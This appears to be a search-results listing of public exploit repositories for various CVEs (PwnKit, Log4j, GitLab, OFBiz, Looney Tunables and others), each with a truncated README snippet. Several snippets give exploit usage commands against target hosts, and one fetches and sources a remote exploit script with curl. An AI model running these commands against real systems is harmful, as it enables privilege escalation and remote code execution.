229189 matches found
CVE-2024-23692-exp
CVE-2024-23692-exp CVE-2024-23692 exp HFS 2.4 RC7...
cve-2021-4034
CVE-2021-4034 exploit but in rust, cause why not ? Based on https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c root@kitploit: $ ./download-and-unpack-vulnerable-pkexec.sh optionally enable setuid/setgid for testing $ cargo run --bin prep && cd playground && cargo run --bin pw...
CVE-2023-7028-GitLab
GitLab-CVE-2023-7028 Example python3 attack.py -u http://TargetIP:8000 -t [email protected] -e [email protected]...
CVE-2021-32157
CVE-2021-32157 Make it possible to build a vulnerable webmin virtual environment as a container using docker Build If there is an error related to download, please comment on line 15 of dockerfile and run line 14 of dockerfile. root@kitploit: docker build -t VulnWebmin . docker run --name...
Ashwesker-CVE-2026-20045
🚨 CVE-2026-20045 — Zero-Day Breakdown 🚨 🧨 What it is A critical remote code execution RCE vulnerability affecting multiple Cisco Unified Communications products. It was actively exploited in the wild before patches were released. 🔥 Why it’s dangerous 🚫 No authentication required 🖥️ Remote code...
CVE-2017-9805-Exploit
This repository does not have a README...
Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz
Exploit CVE-2023-49070 and CVE-2023-51467 Apache OFBiz 18.12.10 Authentication Bypass Vulnerability Apache OFBiz This exploit code has been developed solely for educational purposes and to enhance cybersecurity practices. Any use for illicit purposes is entirely your own responsibility. It is...
Sauercloude
Sauercloude 0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020/2021 CVE-2021-2119...
CVE-2025-31161
Exploit CVE-2025-31161 INSTALLATION 1. root@kitploit: git clone https://github.com/cesarbtakeda/CVE-2025-31161.git && cd CVE-2025-31161 2. Modo De uso root@kitploit: sudo exploit2.py -h -u HOST -p PORT -tu TARGETUSER -nu NEWUSER -np PASSWORD ou 1. Depende da biblioteca lcurl root@kitploit: git...
CVE-2021-3156
CVE-2021-3156 Exploit for CVE-2021-3156...
desc_race
descrace iOS 15.1 kernel exploit POC for CVE-2021-30955 Huge thanks to @realBrightiup for the awesome bug and exploit stratergy. His writeup can be found at: https://www.cyberkl.com/cvelist/cvedetail/24...
CVE-2021-4034
CVE-2021-4034 CVE-2021-4034 in Bash Script Usage: source curl -s https://raw.githubusercontent.com/azminawwar/CVE-2021-4034/main/exploit.sh...
log4j-exploit-builder
log4j-exploit-builder Script to create a log4j CVE-2021-44228 exploit with support for different methods of getting a reverse shell NOTE: The code was speedrunned and will improve in the future...
CVE-2021-4034
CVE-2021-4034 This is an exploit created for CVE-2021-4034 meant as a POC. It is based off the info at https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt. How to use it: Download the exploit folder. Compile prog.c with gcc prog.c Go to the GCONVPATH=. folder and ensure that the "code" fil...
CVE-2021-4034
CVE-2021-4034 polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. PoC If the exploit is working you'll get a root shell immediately: root@kitploit: vagrant@ubuntu-impish:/CVE-2021-4034$ make cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall...
CVE-2007-2447_python
CVE-2007-2447python Exploit i used in HTB...
CVE-2021-4034
CVE-2021-4034 This repository contains the exploit for vulnerability CVE-2021-4034 . Steps: 1. gcc cve-2022-4034 -o cve-2022-4034 2 ./cve-2022-4034...
CVE-2021-31956-EXP
Working in WIN10 1903 Not a perfect exp https://bbs.pediy.com/thread-271140.htm...
cve-2023-4911-exploit-optimized
Security Notice : This repository contains working exploit code for educational and research purposes. Use responsibly and only on systems you own or have explicit permission to test. CVE-2023-4911 Exploit Looney Tunables Optimized, multi-processing exploits for CVE-2023-4911 targeting x8664 and...
CVE-2026-21962
CVE-2026-21962 CVE-2026-21962 EXAMPLE 单目标 root@kitploit: python3 CVE-2026-21962.py http://target:7001 -c "whoami" 批量 + 默认 whoami root@kitploit: python3 CVE-2026-21962.py -f url.txt 批量 + 自定义命令 + 改线程数 root@kitploit: python3 CVE-2026-21962.py -f url.txt -c "id" --threads 20 -o result.txt 反弹 shell 示例...